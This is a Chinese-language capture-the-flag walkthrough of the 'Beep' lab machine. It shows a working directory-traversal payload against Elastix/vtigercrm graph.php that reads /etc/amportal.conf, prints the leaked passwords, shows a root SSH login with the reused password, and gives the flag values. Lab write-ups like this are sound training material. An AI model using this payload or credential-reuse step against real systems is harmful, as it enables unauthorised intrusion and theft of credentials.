Beep10.10.10.7
Datime:2019.10.14
@author:SuperBeauty
信息收集
- zenmap扫描开放端口
2. 挨着访问端口,发现有很多web页面
- 扫描有哪些web路径,emmm发现了很多有趣的东西。。挨着访问,好像web页面没有什么可利用的漏洞。
访问首页发现该机器上有elastix软件系统,Elastix 提供自主的功能包括:视频支持,你可以在Elastix系统中使用视频电话;虚拟支持,在一个盒子里可以使用多个 Elastix 系统;
开始渗透
使用以下命令查找该系统的exp,
searchsploit elastix
find something interesting_
当然还可以直接上exploit-db搜索elastix
找到 graph.php Local File exploits/php/webapps/37637.pl 简称LFI(local file include )
看看该exp的内容
cd /usr/share/exploitdb/exploits/php/webapps
cat 37637.pl
师父提点:可以不用直接进入目录,使用searchsploit -m 37637命令就可以直接将该脚本复制到当前目录下,还可用searchsploit -x 37637 直接查看该脚本内容
searchsploit -m 文件名
searchsploit -x 文件名
这段/vtigercrm有点熟悉
/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
让我们再看看刚刚所扫描的web路径
带入到url里面
页面很乱,get 一个技能
Ctrl u
整理一下页面
发现了很多密码
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
其中密码 jEhdIekWmdjE 出现频率特高,且其他AMPDBPASS都被注释掉了。
用该密码试一下 22端口 连接ssh
ssh root@10.10.10.7
连接成功,qioqio有什么东西
ls
cat root.txt
get root flag
d88e006123842106982acce0aaf453f0
再看看其他文件目录
cd .. 回到根目录
cd home
ls
看看fanis 文件有啥
get user flag
aeff3def0c765c2677b94715cffa73ac
总结
- 当web页面无漏洞可下手时,可关注web里面所搭载的管理系统,查询版本,searchsploit…
- 有种直觉该机器还有其他方式来get flag,因为web页面中不仅只有elastix这个系统,还搭载了其他管理系统,也可从其他管理系统入手,应该也不会太难。
- 总的来说,Beep难度不高,重要的是思路要清晰,不断尝试